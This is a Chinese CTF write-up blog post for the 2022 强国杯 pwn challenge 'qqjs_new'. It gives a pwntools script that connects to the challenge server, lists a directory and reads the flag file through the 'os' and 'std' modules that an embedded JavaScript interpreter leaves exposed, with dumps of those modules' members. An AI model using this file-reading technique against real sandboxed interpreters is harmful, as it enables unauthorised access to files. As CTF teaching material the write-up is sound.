2022 强国杯CTF qjspwn1

PWN

qqjs_new

思路:fuzz下,发现os可以用,用os查找flag位置,位置在/home/ctf/flag下

通过IDA静态分析,发现有个std,在终端敲下std,发现有个函数是loadFile,这个可以读取flag内容

总结一句话:fuzz出能直接读

exp:

from pwn import *

p=remote("39.107.82.142","52300")

p.sendlineafter("> ",'os')
'''
{ O_APPEND: 1024, O_CREAT: 64, O_EXCL: 128, O_RDONLY: 0, O_RDWR: 2, O_TRUNC: 512, O_WRONLY: 1, SIGABRT: 6, SIGALRM: 14, SIGCHLD: 17, SIGCONT: 18, SIGFPE: 8, SIGILL: 4, SIGINT: 2, SIGPIPE: 13, SIGQUIT: 3, SIGSEGV: 11, SIGSTOP: 19, SIGTERM: 15, SIGTSTP: 20, SIGTTIN: 21, SIGTTOU: 22, SIGUSR1: 10, SIGUSR2: 12, S_IFBLK: 24576, S_IFCHR: 8192, S_IFDIR: 16384, S_IFIFO: 4096, S_IFLNK: 40960, S_IFMT: 61440, S_IFREG: 32768, S_IFSOCK: 49152, S_ISGID: 1024, S_ISUID: 2048, WNOHANG: 1, Worker: function Worker(), chdir: function chdir(), clearTimeout: function clearTimeout(), close: function close(), dup: function dup(), dup2: function dup2(), exec: function exec(), getcwd: function getcwd(), isatty: function isatty(), kill: function kill(), lstat: function lstat(), mkdir: function mkdir(), open: function open(), pipe: function pipe(), platform: "linux", read: function read(), readdir: function readdir(), readlink: function readlink(), realpath: function realpath(), remove: function remove(), rename: function rename(), seek: function seek(), setReadHandler: function setReadHandler(), setTimeout: function setTimeout(), setWriteHandler: function setWriteHandler(), signal: function signal(), sleep: function sleep(), stat: function stat(), symlink: function symlink(), ttyGetWinSize: function ttyGetWinSize(), ttySetRaw: function ttySetRaw(), utimes: function utimes(), waitpid: function waitpid(), write: function write() }

'''
p.sendlineafter("> ",'os.readdir("/home/ctf")')

p.sendlineafter("> ",'std')
'''
{ Error: {  }, SEEK_CUR: 1, SEEK_END: 2, SEEK_SET: 0, err: {  }, evalScript: function evalScript(), exit: function exit(), fdopen: function fdopen(), gc: function gc(), getenv: function getenv(), getenviron: function getenviron(), in: {  }, loadFile: function loadFile(), loadScript: function loadScript(), open: function open(), out: {  }, parseExtJSON: function parseExtJSON(), popen: function popen(), printf: function printf(), puts: function puts(), setenv: function setenv(), sprintf: function sprintf(), strerror: function strerror(), tmpfile: function tmpfile(), unsetenv: function unsetenv(), urlGet: function urlGet() }
'''
p.sendlineafter("> ",'std.loadFile("/home/ctf/flag")')
p.interactive()

本文链接:

http://blog.azly.top/index.php/archives/79/
1 + 9 =
快来做第一个评论的人吧~